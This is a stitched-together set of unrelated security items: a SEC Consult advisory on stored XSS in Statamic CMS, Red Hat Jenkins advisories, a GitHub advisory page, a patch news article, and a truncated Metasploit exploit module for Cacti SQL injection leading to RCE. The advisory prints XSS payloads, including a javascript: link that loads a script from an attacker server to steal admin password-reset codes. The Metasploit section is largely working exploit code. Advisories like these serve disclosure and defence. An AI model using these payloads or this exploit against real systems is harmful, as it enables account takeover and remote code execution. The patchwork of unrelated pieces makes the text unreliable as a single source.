Statamic CMS versions prior to 4.46.0 and 3.4.17 suffer from multiple persistent cross site scripting vulnerabilities.

SEC Consult Vulnerability Lab Security Advisory < 20240212-0 >  
=======================================================================  
               title: Multiple Stored Cross-Site Scripting vulnerabilities  
             product: Statamic CMS  
  vulnerable version: <4.46.0, <3.4.17  
       fixed version: >=4.46.0, >=3.4.17  
          CVE number: CVE-2024-24570  
              impact: high  
            homepage: https://statamic.com/  
               found: 2024-01-06  
                  by: Niklas Schilling (Office Munich)  
                      SEC Consult Vulnerability Lab

                      An integrated part of SEC Consult, an Eviden business  
                      Europe | Asia

                      https://www.sec-consult.com

=======================================================================

Vendor description:  
-------------------  
"Statamic is a modern, clean, and highly adaptable CMS built on Laravel  
that can run full-stack, headless, on flat files or databases, or as a  
static site generator."

Source: https://statamic.com/

Business recommendation:  
------------------------  
The vendor provides a patch which should be installed immediately. Furthermore,  
an updated guideline for implementing a Content Security Policy (CSP) is  
provided by the vendor.

SEC Consult highly recommends to perform a thorough security review of the  
product conducted by security professionals to identify and resolve potential  
further security issues.

Vulnerability overview/description:  
-----------------------------------  
1) Stored Cross-Site Scripting in Forms feature (CVE-2024-24570)  
Statamic's Forms feature allows unauthenticated users to upload certain  
filetypes. While only a limited number of file extensions are allowed, it's  
possible to bypass these restrictions to upload an HTML file containing  
JavaScript code.

2) Stored Cross-Site Scripting in Link Field  
Statamic's Link Field feature provides authenticated users a convenient way  
of inserting Hyperlinks into a collection's entry. It was identified that  
it's possible to execute JavaScript code upon clicking on a specially  
crafted Hyperlink.

Proof of concept:  
-----------------  
1) Stored Cross-Site Scripting in Forms feature (CVE-2024-24570)  
When trying to upload an HTML file as an unauthenticated user, the  
.html extension gets correctly detected by Statamic, leading to the file  
being blocked from uploading.

This check can be bypassed though, by instead using a .jpg file extension,  
as files of this type are allowed to be uploaded. Afterwards, the file's  
content is analyzed by Statamic and correctly interpreted as HTML, resulting  
in the initial .jpg extension being replaced with an .html extension. As no  
checks on this newly set file extension are performed, the file is now shown  
as a valid submission in Statamic's "Forms" page.

If an authenticated user accesses this submission, the included JavaScript  
code will be executed. This can be verified by uploading a file called  
"test.jpg" with the following content:

<!DOCTYPE html>  
<html>  
     <body>  
         <script>alert("Stored XSS on "+window.origin)</script>  
     </body>  
</html>

To further demonstrate the criticality of this vulnerability, the following  
JavaScript code can be used:

[ POC code removed from public advisory ]

When an admin user now accesses this JavaScript submission, the following happens:  
1. Load the "Users" page in a hidden iframe and extract the CSRF token from it.  
2. Request user information and extract the user ID and email address from  
    the response.  
3. Request a password reset code for the extracted used ID.  
4. Extract the password reset code from the response and send it to the  
    attacker server including the user's email address.

After receiving the victim's password reset code and email address,  
the attacker can now visit the following URL and set a new password:  
https://<STATAMIC_SERVER>/!/auth/password/reset/<PASSWORD_RESET_CODE>

This results in a successful takeover of the victim's account.

2) Stored Cross-Site Scripting in Link Field  
When using a Link Field of type "URL", the following XSS payload can be used  
as input:  
javascript:var js=document.createElement('script');js.src='https://<ATTACKER_SERVER>/poc.js';document.body.append(js)

As this input is typically placed in the "href" attribute of an anchor tag,  
the JavaScript pseudo protocol can be used to execute arbitrary JavaScript  
code upon clicking on the Hyperlink. In this case the external file "poc.js"  
will be loaded, which contains the JavaScript code from the password reset  
code stealer above (removed from public advisory).

This way, an authenticated user with lower privileges can gain control over an  
admin's account after the admin clicks on the malicious Hyperlink.

Statamic's "sanitize" modifier doesn't prevent this attack, as no illegal  
characters are being used in the XSS payload:  
<a href="{{ url_link | sanitize }}">Link</a>

Vulnerable / tested versions:  
-----------------------------  
The following version has been tested which was the latest version available  
at the time of the test:  
* 4.45.0

The following Statamic CMS versions are affected by this vulnerability:  
* <4.46.0  
* <3.4.17

Vendor contact timeline:  
------------------------  
2024-01-24: Contacting vendor through support@statamic.com  
2024-01-24: Vendor confirms receipt of advisory and states that they aim to  
             resolve the issues within the next few days.  
2024-01-26: Vendor fixes the first stored XSS and shares the corresponding  
             GitHub security advisory draft. Furthermore, valid arguments for  
             mitigating the second stored XSS via a correctly set CSP are  
             supplied. Vendor also creates a new documentation page for  
             setting the CSP in the correct areas.  
2024-01-26: Confirming that setting a correctly configured CSP for the  
             necessary areas results in a higher efficiency in mitigating the  
             second security issue.  
2024-01-29: Suggesting an adjustment of the assigned CVSS3.1 score that was  
             set in the vendor's GitHub security advisory. Also asking for  
             planned public disclosure and the assignment of a CVE number.  
2024-01-29: Vendor adjusts CVSS3.1 score and suggests requesting a  
             CVE number via GitHub.  
2024-01-30: Received CVE number CVE-2024-24570.  
2024-02-12: Coordinated release of advisory.

Solution:  
---------  
The vendor provided a patch for the "Stored Cross-Site Scripting in Forms" feature  
(CVE-2024-24570):

* Update version "4.X" to "4.46.0" or later  
* Update version "3.X" to "3.4.17" or later

Get the newest release of Statamic CMS here:  
https://github.com/statamic/cms/releases

The vendor will not provide a patch regarding "Stored Cross-Site Scripting in  
Link Field" but suggests to implement a correctly configured CSP as described  
in Statamic's newly added documentation page:

https://statamic.dev/tips/content-security-policy

Vendor advisory:  
https://github.com/statamic/cms/security/advisories/GHSA-vqxq-hvxw-9mv9

Workaround:  
-----------  
No workaround available.

Advisory URL:  
-------------  
https://sec-consult.com/vulnerability-lab/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab  
An integrated part of SEC Consult, an Eviden business  
Europe | Asia

About SEC Consult Vulnerability Lab  
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an  
Eviden business. It ensures the continued knowledge gain of SEC Consult in the  
field of network and application security to stay ahead of the attacker. The  
SEC Consult Vulnerability Lab supports high-quality penetration testing and  
the evaluation of new offensive and defensive technologies for our customers.  
Hence our customers obtain the most current information about vulnerabilities  
and valid recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
Interested to work with the experts of SEC Consult?  
Send us your application https://sec-consult.com/career/

Interested in improving your cyber security with the experts of SEC Consult?  
Contact our local offices https://sec-consult.com/contact/  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: security-research at sec-consult dot com  
Web: https://www.sec-consult.com  
Blog: https://blog.sec-consult.com  
Twitter: https://twitter.com/sec_consult

EOF Niklas Schilling / @2024

Statamic CMS Cross Site Scripting

Red Hat Security Advisory 2024-0778-03 - An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12. Issues addressed include bypass, code execution, cross site request forgery, cross site scripting, denial of service, improper authorization, information leakage, insecure permissions, and open redirection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0778.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: Jenkins and Jenkins-2-plugins security update  
Advisory ID:        RHSA-2024:0778-03  
Product:            OpenShift Developer Tools and Services  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0778  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2020-7692  
====================================================================

Summary: 

An update for Jenkins and Jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.12.

Red Hat Product Security has rated this update as having a security impact of Critical. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* google-oauth-client: missing PKCE support in accordance with the RFC for OAuth 2.0 for Native Apps can lead to improper authorization (CVE-2020-7692)

* maven: Block repositories using http by default (CVE-2021-26291)

* snakeyaml: Denial of Service due to missing nested depth limitation for collections (CVE-2022-25857)

* maven-shared-utils: Command injection via Commandline class (CVE-2022-29599)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin (CVE-2023-24422)

* jenkins: Arbitrary file read vulnerability through the CLI can lead to RCE (CVE-2024-23897)

* jenkins: cross-site WebSocket hijacking (CVE-2024-23898)

* golang: go/parser: stack exhaustion in all Parse* functions (CVE-2022-1962)

* guava: insecure temporary directory creation (CVE-2023-2976)

* springframework: Spring Expression DoS Vulnerability (CVE-2023-20861)

* spring-security: Empty SecurityContext Is Not Properly Saved Upon Logout (CVE-2023-20862)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin (CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin (CVE-2023-25762)

* jetty-server: OutOfMemoryError for large multipart without filename read via request.getParameter() (CVE-2023-26048)

* jetty-server: Cookie parsing of quoted values can exfiltrate values from other cookies (CVE-2023-26049)

* Jenkins: Open redirect vulnerability in OpenShift Login Plugin (CVE-2023-37947)

* jetty: Improper validation of HTTP/1 content-length (CVE-2023-40167)

* jenkins-plugins: cloudbees-folder: CSRF vulnerability in Folders Plugin (CVE-2023-40337)

* jenkins-plugins: cloudbees-folder: Information disclosure in Folders Plugin (CVE-2023-40338)

* jenkins-plugins: config-file-provider: Improper masking of credentials in Config File Provider Plugin (CVE-2023-40339)

* jenkins-plugins: blueocean: CSRF vulnerability in Blue Ocean Plugin allows capturing credentials (CVE-2023-40341)

* Jenkins: Temporary file parameter created with insecure permissions (CVE-2023-27903)

* Jenkins: Information disclosure through error stack traces related to agents (CVE-2023-27904)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2020-7692

References:

https://access.redhat.com/security/updates/classification/#important  
https://bugzilla.redhat.com/show_bug.cgi?id=1856376  
https://bugzilla.redhat.com/show_bug.cgi?id=1955739  
https://bugzilla.redhat.com/show_bug.cgi?id=2066479  
https://bugzilla.redhat.com/show_bug.cgi?id=2107376  
https://bugzilla.redhat.com/show_bug.cgi?id=2126789  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2164278  
https://bugzilla.redhat.com/show_bug.cgi?id=2170039  
https://bugzilla.redhat.com/show_bug.cgi?id=2170041  
https://bugzilla.redhat.com/show_bug.cgi?id=2177632  
https://bugzilla.redhat.com/show_bug.cgi?id=2177634  
https://bugzilla.redhat.com/show_bug.cgi?id=2180530  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2222710  
https://bugzilla.redhat.com/show_bug.cgi?id=2227788  
https://bugzilla.redhat.com/show_bug.cgi?id=2232422  
https://bugzilla.redhat.com/show_bug.cgi?id=2232423  
https://bugzilla.redhat.com/show_bug.cgi?id=2232425  
https://bugzilla.redhat.com/show_bug.cgi?id=2232426  
https://bugzilla.redhat.com/show_bug.cgi?id=2236340  
https://bugzilla.redhat.com/show_bug.cgi?id=2236341  
https://bugzilla.redhat.com/show_bug.cgi?id=2239634  
https://bugzilla.redhat.com/show_bug.cgi?id=2260180  
https://bugzilla.redhat.com/show_bug.cgi?id=2260182  
https://issues.redhat.com/browse/JKNS-271  
https://issues.redhat.com/browse/JKNS-289  
https://issues.redhat.com/browse/OCPBUGS-10976  
https://issues.redhat.com/browse/OCPBUGS-11158  
https://issues.redhat.com/browse/OCPBUGS-11348  
https://issues.redhat.com/browse/OCPBUGS-1357  
https://issues.redhat.com/browse/OCPBUGS-13652  
https://issues.redhat.com/browse/OCPBUGS-13901  
https://issues.redhat.com/browse/OCPBUGS-14113  
https://issues.redhat.com/browse/OCPBUGS-14393  
https://issues.redhat.com/browse/OCPBUGS-14642  
https://issues.redhat.com/browse/OCPBUGS-15648  
https://issues.redhat.com/browse/OCPBUGS-1709  
https://issues.redhat.com/browse/OCPBUGS-1942  
https://issues.redhat.com/browse/OCPBUGS-2099  
https://issues.redhat.com/browse/OCPBUGS-2184  
https://issues.redhat.com/browse/OCPBUGS-2318  
https://issues.redhat.com/browse/OCPBUGS-27391  
https://issues.redhat.com/browse/OCPBUGS-3692  
https://issues.redhat.com/browse/OCPBUGS-4819  
https://issues.redhat.com/browse/OCPBUGS-4833  
https://issues.redhat.com/browse/OCPBUGS-655  
https://issues.redhat.com/browse/OCPBUGS-6632  
https://issues.redhat.com/browse/OCPBUGS-6982  
https://issues.redhat.com/browse/OCPBUGS-7016  
https://issues.redhat.com/browse/OCPBUGS-7050  
https://issues.redhat.com/browse/OCPBUGS-710  
https://issues.redhat.com/browse/OCPBUGS-8420  
https://issues.redhat.com/browse/OCPBUGS-8497  
https://issues.redhat.com/browse/OCPTOOLS-246

Red Hat Security Advisory 2024-0778-03

Red Hat Security Advisory 2024-0777-03 - An update for jenkins and jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.14. Issues addressed include bypass, code execution, cross site request forgery, cross site scripting, denial of service, information leakage, and open redirection vulnerabilities.

The following advisory data is extracted from:

https://access.redhat.com/security/data/csaf/v2/advisories/2024/rhsa-2024_0777.json

Red Hat officially shut down their mailing list notifications October 10, 2023.  Due to this, Packet Storm has recreated the below data as a reference point to raise awareness.  It must be noted that due to an inability to easily track revision updates without crawling Red Hat's archive, these advisories are single notifications and we strongly suggest that you visit the Red Hat provided links to ensure you have the latest information available if the subject matter listed pertains to your environment.

- Packet Storm Staff

====================================================================  
Red Hat Security Advisory

Synopsis:           Important: jenkins and jenkins-2-plugins security update  
Advisory ID:        RHSA-2024:0777-03  
Product:            OpenShift Developer Tools and Services  
Advisory URL:       https://access.redhat.com/errata/RHSA-2024:0777  
Issue date:         2024-02-12  
Revision:           03  
CVE Names:          CVE-2022-25857  
====================================================================

Summary: 

An update for jenkins and jenkins-2-plugins is now available for OpenShift Developer Tools and Services for OCP 4.14.

Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.

Description:

Jenkins is a continuous integration server that monitors executions of repeated jobs, such as building a software project or jobs run by cron.

Security Fix(es):

* golang: net/http, x/net/http2: rapid stream resets can cause excessive work (CVE-2023-44487) (CVE-2023-39325)

* HTTP/2: Multiple HTTP/2 enabled web servers are vulnerable to a DDoS attack (Rapid Reset Attack) (CVE-2023-44487)

* apache-commons-text: variable interpolation RCE (CVE-2022-42889)

* snakeyaml: Denial of Service due to missing nested depth limitation for collections (CVE-2022-25857)

* maven-shared-utils: Command injection via Commandline class (CVE-2022-29599)

* jenkins-2-plugins/script-security: Sandbox bypass vulnerability in Script Security Plugin (CVE-2023-24422)

* Jenkins: Session fixation vulnerability in OpenShift Login Plugin (CVE-2023-37946)

* jenkins-plugins: cloudbees-folder: CSRF vulnerability in Folders Plugin may approve unsandboxed scripts (CVE-2023-40336)

* guava: insecure temporary directory creation (CVE-2023-2976)

* jenkins-2-plugins/JUnit: Stored XSS vulnerability in JUnit Plugin (CVE-2023-25761)

* jenkins-2-plugins/pipeline-build-step: Stored XSS vulnerability in Pipeline: Build Step Plugin (CVE-2023-25762)

* jackson-databind: denial of service via cylic dependencies (CVE-2023-35116)

* Jenkins: Open redirect vulnerability in OpenShift Login Plugin (CVE-2023-37947)

* jenkins-plugins: cloudbees-folder: CSRF vulnerability in Folders Plugin (CVE-2023-40337)

* jenkins-plugins: cloudbees-folder: Information disclosure in Folders Plugin (CVE-2023-40338)

* jenkins-plugins: config-file-provider: Improper masking of credentials in Config File Provider Plugin (CVE-2023-40339)

* jenkins-plugins: blueocean: CSRF vulnerability in Blue Ocean Plugin allows capturing credentials (CVE-2023-40341)

For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.

Solution:

https://access.redhat.com/articles/11258

CVEs:

CVE-2022-25857

References:

https://access.redhat.com/security/updates/classification/#important  
https://access.redhat.com/security/vulnerabilities/RHSB-2023-003  
https://bugzilla.redhat.com/show_bug.cgi?id=2066479  
https://bugzilla.redhat.com/show_bug.cgi?id=2126789  
https://bugzilla.redhat.com/show_bug.cgi?id=2135435  
https://bugzilla.redhat.com/show_bug.cgi?id=2164278  
https://bugzilla.redhat.com/show_bug.cgi?id=2170039  
https://bugzilla.redhat.com/show_bug.cgi?id=2170041  
https://bugzilla.redhat.com/show_bug.cgi?id=2215214  
https://bugzilla.redhat.com/show_bug.cgi?id=2215229  
https://bugzilla.redhat.com/show_bug.cgi?id=2222709  
https://bugzilla.redhat.com/show_bug.cgi?id=2222710  
https://bugzilla.redhat.com/show_bug.cgi?id=2232422  
https://bugzilla.redhat.com/show_bug.cgi?id=2232423  
https://bugzilla.redhat.com/show_bug.cgi?id=2232424  
https://bugzilla.redhat.com/show_bug.cgi?id=2232425  
https://bugzilla.redhat.com/show_bug.cgi?id=2232426  
https://bugzilla.redhat.com/show_bug.cgi?id=2242803  
https://bugzilla.redhat.com/show_bug.cgi?id=2243296  
https://issues.redhat.com/browse/JKNS-271  
https://issues.redhat.com/browse/JKNS-289  
https://issues.redhat.com/browse/JKNS-337  
https://issues.redhat.com/browse/JKNS-344  
https://issues.redhat.com/browse/JKNS-345  
https://issues.redhat.com/browse/OCPBUGS-11158  
https://issues.redhat.com/browse/OCPBUGS-11253  
https://issues.redhat.com/browse/OCPBUGS-11254  
https://issues.redhat.com/browse/OCPBUGS-11446  
https://issues.redhat.com/browse/OCPBUGS-1357  
https://issues.redhat.com/browse/OCPBUGS-13869  
https://issues.redhat.com/browse/OCPBUGS-14111  
https://issues.redhat.com/browse/OCPBUGS-14609  
https://issues.redhat.com/browse/OCPBUGS-15646  
https://issues.redhat.com/browse/OCPBUGS-15902  
https://issues.redhat.com/browse/OCPBUGS-1709  
https://issues.redhat.com/browse/OCPBUGS-1942  
https://issues.redhat.com/browse/OCPBUGS-2099  
https://issues.redhat.com/browse/OCPBUGS-2184  
https://issues.redhat.com/browse/OCPBUGS-2318  
https://issues.redhat.com/browse/OCPBUGS-23438  
https://issues.redhat.com/browse/OCPBUGS-27388  
https://issues.redhat.com/browse/OCPBUGS-655  
https://issues.redhat.com/browse/OCPBUGS-6579  
https://issues.redhat.com/browse/OCPBUGS-6870  
https://issues.redhat.com/browse/OCPBUGS-710  
https://issues.redhat.com/browse/OCPBUGS-8377  
https://issues.redhat.com/browse/OCPBUGS-8442  
https://issues.redhat.com/browse/OCPTOOLS-244

Red Hat Security Advisory 2024-0777-03

Mattermost Jira Plugin fails to protect against logout CSRF allowing an attacker to post a specially crafted message that would disconnect a user's Jira connection in Mattermost only by viewing the message.

Skip to content

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

1.  GitHub Advisory Database
2.  GitHub Reviewed
3.  CVE-2024-23319

**Mattermost Jira Plugin vulnerable to Cross-Site Request Forgery**

Low severity GitHub Reviewed Published Feb 9, 2024 to the GitHub Advisory Database • Updated Feb 9, 2024

**Package**

gomod github.com/mattermost/mattermost-plugin-jira (Go)

**Affected versions**

< 4.0.0-rc2

**Patched versions**

4.0.0-rc2

**Description**

Published to the GitHub Advisory Database

Feb 9, 2024

GHSA-4fp6-574p-fc35: Mattermost Jira Plugin vulnerable to Cross-Site Request Forgery

Cisco, Fortinet, and VMware have released security fixes for multiple security vulnerabilities, including critical weaknesses that could be exploited to perform arbitrary actions on affected devices.
The first set from Cisco consists of three flaws – CVE-2024-20252 and CVE-2024-20254 (CVSS score: 9.6) and CVE-2024-20255 (CVSS score: 8.2) – impacting Cisco Expressway Series that could allow an

Cyber Threat / Network Security

Cisco, Fortinet, and VMware have released security fixes for multiple security vulnerabilities, including critical weaknesses that could be exploited to perform arbitrary actions on affected devices.

The first set from Cisco consists of three flaws – CVE-2024-20252 and CVE-2024-20254 (CVSS score: 9.6) and CVE-2024-20255 (CVSS score: 8.2) – impacting Cisco Expressway Series that could allow an unauthenticated, remote attacker to conduct cross-site request forgery (CSRF) attacks.

All the issues, which were found during internal security testing, stem from insufficient CSRF protections for the web-based management interface that could permit an attacker to perform arbitrary actions with the privilege level of the affected user.

"If the affected user has administrative privileges, these actions could include modifying the system configuration and creating new privileged accounts," Cisco said about CVE-2024-20252 and CVE-2024-20254.

On the other hand, successful exploitation of CVE-2024-20255 targeting a user with administrative privileges could enable the threat actor to overwrite system configuration settings, resulting in a denial-of-service (DoS) condition.

Another crucial difference between the two sets of flaws is that while the former two affect Cisco Expressway Series devices in the default configuration, CVE-2024-20252 only impacts them if the cluster database (CDB) API feature has been enabled. It's disabled by default.

Patches for the vulnerabilities are available in Cisco Expressway Series Release versions 14.3.4 and 15.0.0.

Fortinet, for its part, has released a second round of updates to address what are bypasses for a previously disclosed critical flaw (CVE-2023-34992, CVSS score: 9.7) in FortiSIEM supervisor that could result in the execution of arbitrary code, according to Horizon3.ai researcher Zach Hanley.

Tracked as CVE-2024-23108 and CVE-2024-23109 (CVSS scores: 9.8), the flaws "may allow a remote unauthenticated attacker to execute unauthorized commands via crafted API requests."

It's worth noting that Fortinet resolved another variant of CVE-2023-34992 by closing out CVE-2023-36553 (CVSS score: 9.3) in November 2023. The two new vulnerabilities are/will be plugged in the following versions -

*   FortiSIEM version 7.1.2 or above
*   FortiSIEM version 7.2.0 or above (upcoming)
*   FortiSIEM version 7.0.3 or above (upcoming)
*   FortiSIEM version 6.7.9 or above (upcoming)
*   FortiSIEM version 6.6.5 or above (upcoming)
*   FortiSIEM version 6.5.3 or above (upcoming), and
*   FortiSIEM version 6.4.4 or above (upcoming)

Completing the trifecta is VMware, which has warned of five moderate-to-important severity flaws in Aria Operations for Networks (formerly vRealize Network Insight) -

*   CVE-2024-22237 (CVSS score: 7.8) - Local privilege escalation vulnerability that allows a console user to gain regular root access

*   CVE-2024-22238 (CVSS score: 6.4) - Cross-site scripting (XSS) vulnerability that allows a malicious actor with admin privileges to inject malicious code into user profile configurations

*   CVE-2024-22239 (CVSS score: 5.3) - Local privilege escalation vulnerability that allows a console user to gain regular shell access

*   CVE-2024-22240 (CVSS score: 4.9) - Local file read vulnerability that allows a malicious actor with admin privileges to access sensitive information

*   CVE-2024-22241 (CVSS score: 4.3) - Cross-site scripting (XSS) vulnerability that allows a malicious actor with admin privileges to inject malicious code and take over the user account

To mitigate the risks, all users of VMware Aria Operations for Networks version 6.x are being recommended to upgrade to version 6.12.0.

Considering the history of exploitation when it comes to Cisco, Fortinet, and VMware flaws, patching is a necessary and crucial first step that organizations need to take to handle the shortcomings.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Critical Patches Released for New Flaws in Cisco, Fortinet, VMware Products

This Metasploit exploit module leverages sql injection and local file inclusion vulnerabilities in Cacti versions prior to 1.2.26 to achieve remote code execution. Authentication is needed and the account must have access to the vulnerable PHP script (pollers.php). This is granted by setting the Sites/Devices/Data permission in the General Administration section.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::SQLi  include Msf::Exploit::FileDropper  prepend Msf::Exploit::Remote::AutoCheck  class CactiError < StandardError; end  class CactiNotFoundError < CactiError; end  class CactiVersionNotFoundError < CactiError; end  class CactiNoAccessError < CactiError; end  class CactiCsrfNotFoundError < CactiError; end  class CactiLoginError < CactiError; end  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Cacti RCE via SQLi in pollers.php',        'Description' => %q{          This exploit module leverages a SQLi (CVE-2023-49085) and a LFI          (CVE-2023-49084) vulnerability in Cacti versions prior to 1.2.26 to          achieve RCE. Authentication is needed and the account must have access          to the vulnerable PHP script (`pollers.php`). This is granted by          setting the `Sites/Devices/Data` permission in the `General          Administration` section.        },        'License' => MSF_LICENSE,        'Author' => [          'Aleksey Solovev', # Initial research and discovery          'Christophe De La Fuente' # Metasploit module        ],        'References' => [          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-vr3c-38wh-g855'], # SQLi          [ 'URL', 'https://github.com/Cacti/cacti/security/advisories/GHSA-pfh9-gwm6-86vp'], # LFI (RCE)          [ 'CVE', '2023-49085'], # SQLi          [ 'CVE', '2023-49084'] # LFI (RCE)        ],        'Platform' => ['unix linux win'],        'Privileged' => false,        'Arch' => ARCH_CMD,        'Targets' => [          [            'Linux Command',            {              'Arch' => ARCH_CMD,              'Platform' => [ 'unix', 'linux' ]            }          ],          [            'Windows Command',            {              'Arch' => ARCH_CMD,              'Platform' => 'win'            }          ]        ],        'DefaultOptions' => {          'SqliDelay' => 3        },        'DisclosureDate' => '2023-12-20',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [CONFIG_CHANGES, IOC_IN_LOGS]        }      )    )    register_options(      [        OptString.new('USERNAME', [ true, 'User to login with', 'admin']),        OptString.new('PASSWORD', [ true, 'Password to login with', 'admin']),        OptString.new('TARGETURI', [ true, 'The base URI of Cacti', '/cacti'])      ]    )  end  def sqli    @sqli ||= create_sqli(dbms: SQLi::MySQLi::TimeBasedBlind) do |sqli_payload|      sqli_final_payload = '"'      sqli_final_payload << ';select ' unless sqli_payload.start_with?(';') || sqli_payload.start_with?(' and')      sqli_final_payload << "#{sqli_payload};select * from poller where 1=1 and '%'=\""      send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'pollers.php'),        'method' => 'POST',        'keep_cookies' => true,        'vars_post' => {          '__csrf_magic' => @csrf_token,          'name' => 'Main Poller',          'hostname' => 'localhost',          'timezone' => '',          'notes' => '',          'processes' => '1',          'threads' => '1',          'id' => '2',          'save_component_poller' => '1',          'action' => 'save',          'dbhost' => sqli_final_payload        },        'vars_get' => {          'header' => 'false'        }      )    end  end  def get_version(html)    # This will return an empty string if there is no match    version_str = html.xpath('//div[@class="versionInfo"]').text    unless version_str.include?('The Cacti Group')      raise CactiNotFoundError, 'The web server is not running Cacti'    end    unless version_str.match(/Version (?<version>\d{1,2}\.\d{1,2}.\d{1,2})/)      raise CactiVersionNotFoundError, 'Could not detect the version'    end    Regexp.last_match[:version]  end  def get_csrf_token(html)    html.xpath('//form/input[@name="__csrf_magic"]/@value').text  end  def do_login    if @csrf_token.blank? || @cacti_version.blank?      res = send_request_cgi(        'uri' => normalize_uri(target_uri.path, 'index.php'),        'method' => 'GET',        'keep_cookies' => true      )      if res.nil?        raise CactiNoAccessError, 'Could not access `index.php` - no response'      end      html = res.get_html_document      if @csrf_token.blank?        print_status('Getting the CSRF token to login')        @csrf_token = get_csrf_token(html)        if @csrf_token.empty?          # raise an error since without the CSRF token, we cannot login          raise CactiCsrfNotFoundError, 'Cannot get the CSRF token'        else          vprint_good("CSRF token: #{@csrf_token}")        end      end      if @cacti_version.blank?        print_status('Getting the version')        begin          @cacti_version = get_version(html)          vprint_good("Version: #{@cacti_version}")        rescue CactiError => e          # We can still log in without the version          print_bad("Could not get the version, the exploit might fail: #{e}")        end      end    end    print_status("Attempting login with user `#{datastore['USERNAME']}` and password `#{datastore['PASSWORD']}`")    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'POST',      'keep_cookies' => true,      'vars_post' => {        '__csrf_magic' => @csrf_token,        'action' => 'login',        'login_username' => datastore['USERNAME'],        'login_password' => datastore['PASSWORD']      }    )    raise CactiNoAccessError, 'Could not login - no response' if res.nil?    raise CactiLoginError, "Login failure - unexpected HTTP response code: #{res.code}" unless res.code == 302    print_good('Logged in')  end  def check    # Step 1 - Check if the target is Cacti and get the version    print_status('Checking Cacti version')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'index.php'),      'method' => 'GET',      'keep_cookies' => true    )    return CheckCode::Unknown('Could not connect to the web server - no response') if res.nil?    html = res.get_html_document    begin      @cacti_version = get_version(html)      version_msg = "The web server is running Cacti version #{@cacti_version}"    rescue CactiNotFoundError => e      return CheckCode::Safe(e.message)    rescue CactiVersionNotFoundError => e      return CheckCode::Unknown(e.message)    end    if Rex::Version.new(@cacti_version) < Rex::Version.new('1.2.26')      print_good(version_msg)    else      return CheckCode::Safe(version_msg)    end    # Step 2 - Login    @csrf_token = get_csrf_token(html)    return CheckCode::Unknown('Could not get the CSRF token from `index.php`') if @csrf_token.empty?    begin      do_login    rescue CactiError => e      return CheckCode::Unknown("Login failed: #{e}")    end    @logged_in = true    # Step 3 - Check if the user has enough permissions to reach `pollers.php`    print_status('Checking permissions to access `pollers.php`')    res = send_request_cgi(      'uri' => normalize_uri(target_uri.path, 'pollers.php'),      'method' => 'GET',      'keep_cookies' => true,      'headers' => {        'X-Requested-With' => 'XMLHttpRequest'      }    )    return CheckCode::Unknown('Could not access `pollers.php` - no response') if res.nil?    return CheckCode::Safe('Could not access `pollers.php` - insufficient permissions') if res.code == 401    return CheckCode::Unknown("Could not access `pollers.php` - unexpected HTTP response code: #{res.code}") unless res.code == 200    # Step 4 - Check if 